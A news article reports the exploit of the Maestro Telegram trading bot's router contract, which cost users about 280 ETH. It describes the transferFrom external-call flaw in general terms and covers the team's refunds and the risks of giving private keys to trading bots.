In a recent security breach, hackers managed to exploit a Telegram trading bot Maestro, resulting in the theft of over 280 Ethereum (ETH), equivalent to $500,000.
Telegram trading bots are designed to streamline on-chain trading and farming, although some require users to share their private keys, raising concerns about security.
The breach occurred due to an external call vulnerability in the Maestro Router 2 smart contract, as revealed by blockchain security firm Beosin.
Attackers exploited this vulnerability to pass a token address, designate the function as “transferfrom,” and specify parameters like the victim’s and their own addresses. This allowed them to transfer the victim’s tokens to their address through the “transferfrom” function.
“Attackers can pass in a token address, fill in the called function as transferfrom, with parameters as the victim’s address and their own address, so they can transfer the victim’s tokens to their own address through transferfrom.”
Another blockchain analysis firm, PeckShield, reported that a phishing wallet stole 37 million JOE tokens through an exploit.
This malicious activity caused the price of JOE to plummet by more than 30%, with Maestro unable to purchase JOE tokens to refund users due to a lack of liquidity.
Following the attack, the Maestro attacker transferred the stolen 280 ETH to Railgun, a crypto privacy tool designed to obfuscate transaction details.
In response, the Maestro team acted swiftly, identifying and addressing the exploit.
They updated their router to a secure, exploit-free implementation, allowing trading to resume normally. However, tokens associated with SushiSwap, ShibaSwap, and ETH PancakeSwap pools were temporarily unavailable.
Maestro took responsibility for the incident and promptly refunded all affected users. The team purchased the tokens and sent them to the victims’ wallets, ensuring that every affected wallet received the full amount they lost.
It’s worth noting that in May 2023, Maestro’s earnings reached over $20 million, with the trading bot collecting a monthly commission of $5 million at its peak. While Maestro offers the potential for substantial profits, it comes at the cost of users revealing their private keys to the bot to sign transactions.
This contradicts the decentralised ethos of “not your keys, not your coins.”
In light of the Maestro attack, caution is advised when using such bots. As one Twitter user highlighted, “Maestro bot just got EXPLOITED 🚨 I never did trust all the stupid bots popping out left and right. Stay away from these bots. Be safe.”
However, it’s crucial to note that the exploit primarily targeted the router, and wallet credentials remained uncompromised, according to the Maestro team.